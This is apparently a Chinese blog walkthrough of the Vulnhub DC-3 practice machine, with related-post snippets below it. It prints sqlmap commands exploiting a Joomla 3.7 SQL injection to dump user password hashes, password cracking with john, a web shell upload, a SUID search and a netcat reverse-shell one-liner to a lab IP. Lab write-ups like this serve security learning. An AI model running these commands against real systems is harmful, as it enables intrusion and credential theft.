【Vulnhub】DC-3

已于 2023-06-13 08:59:33 修改
阅读量53 收藏
点赞数
分类专栏: Vulnhub 文章标签: linux 服务器 python 网络安全
于 2023-06-12 22:09:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangshuaiijie/article/details/131175944
版权

下载地址链接: DC-3
在这里插入图片描述
nmap扫,只开了80端口,
网站信息,只有一个flag,并且要root权限
在这里插入图片描述
扫目录,README.txt,版本3.7,百度搜一下,sql注入漏洞,用sqlmap
在这里插入图片描述

sqlmap

查库
sqlmap -u "http://192.168.132.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
查表
sqlmap -u "http://192.168.132.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D"joomladb" --tables -p list[fullordering]
查列
sqlmap -u "http://192.168.132.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D"joomladb" -T"#__users" --columns -p list[fullordering]
列出
sqlmap -u "http://192.168.132.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D"joomladb" -T"#__users" -C"username,password"--dump -p list[fullordering]

在这里插入图片描述
加密的
将密码写入pass.txt中
用kali中的解密工具解密

john pass.txt

在这里插入图片描述
后台登入,写入一句话木马,冰蝎连接

在这里插入图片描述
既然要提权,先看能不能suid提权

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述
不能,先收集信息,没有提示先看看系统有什么漏洞
在这里插入图片描述

在这里插入图片描述
和百度搜到的一样,漏洞利用
下载,解压,编译。
注意需要将shell变成交互式的才能提权成功

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.85.139 9000 >/tmp/f #映射到msf上
python -c 'import pty;pty.spawn("/bin/bash")'#python交互

在这里插入图片描述

总结

DC-3没有提示,对我这样的新手来说还是难了些。

逢星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub DC-3
柠檬木有枝
07-14 1138
访问服务,发现是 joomla 服务,使用 joomlacan 扫描 joomlascan -u 192.168.6.129 3.7.0 版本,存在 SQl 注入漏洞(CVE-2017-8917) github 下载 exp 然后运行,获取到用户名密码 hash 使用 hashcat 破解 hash,破解密码得 snoopy 登录到后台 发现提示,需要获取到 root 权限 编辑模版,修改...
vulnhub DC-3 靶机渗透测试
小松博客
05-21 171
我们使用账号admin,密码snoopy登陆到后台,再次回到msf中的利用脚本,输入run运行脚本。找到了不少漏洞可用,但就这个漏洞好使:CVE-2016-4557。得到一个漏洞利用脚本下载链接,我们把他down下来,然后解压。然后等待一下,输入ls查看目录内容,发现多了几个可执行文件。已经是root,直接cd到 /root目录,ls查看文件。拿到shell以后,我们上传漏洞检测脚本,寻找提权漏洞。等待几秒钟,然后输入whoami查看自己的权限。发现两个,可以尝试使用这个sql注入漏洞,
Vulnhub DC-3靶机渗透攻击过程演练
zhongxj183的博客
03-26 3193
Vulnhub DC-3靶机渗透攻击过程演练 DC-3介绍 DC-3靶机只有1个flag,一个入口点,根本没有任何线索。 环境准备 下载DC-3靶机导入VMware,选择和Kali同一网络适配器,DHCP获取IP即可 渗透过程 信息收集 首先扫描存活主机,得到目标靶机的IP nmap -sP 192.168.64.0/24 全端口扫描 nmap -T4 -sC -sV -p1-65535 192.168.64.157 仅开放了80端口,一个用 Joomla! 搭建的网站。Joomla! 是一套全球
Vulnhub靶场----3、DC-3.2
七天
03-14 563
1 、只开放80端口的情况下,网站指纹、目录扫描等方向 2 、通过网站CMS版本信息搜索相关版本漏洞 3 、利用版本SQL注入漏洞获取后台登录账号密码 4 、后台寻找webshell插入地址 5 、获取shell,寻找服务器版本漏洞 6 、利用服务器版本漏洞提权。
vulnhub DC-3靶机实战
m0_51195235的博客
10-04 271
vulnhub DC-3靶机实战
vulnhub DC-3
qq_48318463的博客
05-27 1570
使用 searchploit -p +后面的路径 可以展开详细内容 (显示漏洞利用的完整路径,如果可能还将路径复制到剪贴板,后面跟漏洞ID号) 括号内是官方原文翻译。find,看一圈也没有啥能提权的(这个凭个人经验,假如出现find就能用find -文件名 -exec来提权)这句代码是用来反弹shell用的 其中ip为自己kali的ip,端口号是监听开放选择的端口,任意。它给的是第一步的sqlmap命令 爆库,有5个 看框架名字基本就是joomladb了。让使用sqlmap,下面还给格式了。
Vulnhub DC-3靶机渗透测试(DC系列)
Alexhirchi的博客
10-11 923
每日学习~ 冲冲冲 VulnHub 入门DC系列之DC-1 说明 靶场下载地址:https://www.vulnhub.com/entry/dc-32,312/ 渗透靶场:VirtualBox 攻击靶机:本地机+kail(VMware) Flag:5个 启动DC-1靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机 ...
Vulnhub DC-3靶机思路分析
Sum
03-26 177
DC-3(入门) 关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-3: 下载地址: https : //download.vulnhub.com/dc/DC-3.zip 环境: Vmware 15 Pro虚拟机软件 DC-3靶机IP地址:192.168.233.140 Kali的IP地址:192.168.233.134 主机渗透系统: kali2020 安装好虚拟机后挂载Vmware运行 局域网内主机发现 扫描局域网所有设备(所有
VulnHub DC-3
GDL1411983801的博客
12-31 1007
DC-3虚拟机文件夹压缩包链接:https://pan.baidu.com/s/1kZ9RNflZSmV4Vr2UmyMA1g提取码:d9cz–来自百度网盘超级会员V6的分享1.若出现报错提醒:2.选择编辑虚拟机设置后,移除CD/DVD3.修改网卡为NAT模式4.成功进入DC-3。
Vulnhub - DC-1
qq_46081990的博客
03-14 376
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
linux磁盘可视化分析工具
最新发布
吻等离子的博客
08-02 501
Baobab 是 GNOME 桌面环境中的一款图形化磁盘使用分析工具。它能够扫描文件系统并显示各个文件和目录的磁盘使用情况,以易于理解的树形图或圆环图展示。这种可视化方式使得用户能够快速找到占用空间较大的文件和目录。Baobab 是一款非常实用的磁盘使用可视化工具,特别适合用来分析和管理 Linux 系统中的磁盘空间。通过它的直观界面和强大的功能,用户可以轻松找到占用磁盘空间最多的文件和目录,从而采取相应的措施进行清理或优化。
Linux地址空间详解
m0_74830524的博客
08-02 509
本篇通过对物理内存和页表详细的讲解,对 Linux 系统下的地址空间做了深度的剖析。
LinuxUNIX系统编程手册——(十四)系统编程概念
hello_world0_0的博客
07-30 618
设备专用文件与系统的某个设备相对应。在内核中,每种设备类型都有与之相对应的设备驱动程序,用来处理设备的所有 I/O 请求。设备驱动程序属内核代码单元,可执行一系列操作,(通常)与相关硬件的输入/输出动作相对应。由设备驱动程序提供的 API 是固定的,包含的操作对应于系统调用 open()、close()、read()、write()、mmap()以及 ioctl()。每个设备驱动程序所提供的接口一致,这隐藏了每个设备在操作方面的差异,从而满足了 I/O 操作的通用性。可将设备划分为以下两种类型。
linux查询占用端口 杀死占用端口进程
ll回家了
08-02 131
在确定了占用端口的进程之后,您可以使用 `kill` 或 `pkill` 命令来终止这些进程。`lsof`(列出打开的文件)命令是另一个强大的工具,用于检查哪些进程在使用特定端口。您可以使用 `netstat` 和 `lsof` 命令来检查哪些进程在使用特定端口。- **`-n`**:以数字形式显示地址,避免DNS查找。- **`-p`**:显示进程的PID和程序名称。- `kill -9 `:强制终止进程。- **`-t`**:显示TCP端口。- **`-l`**:列出监听端口。
DC-DC电源模块工作原理详解
3. 逆变:逆变器将直流电转换为高频交流电,这是DC-DC转换的关键部分。高频操作允许电源模块小型化,因为频率越高,功率密度越大,体积和重量相对较小。 4. 输出整流与滤波:逆变后的高频交流电通过二极管整流并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值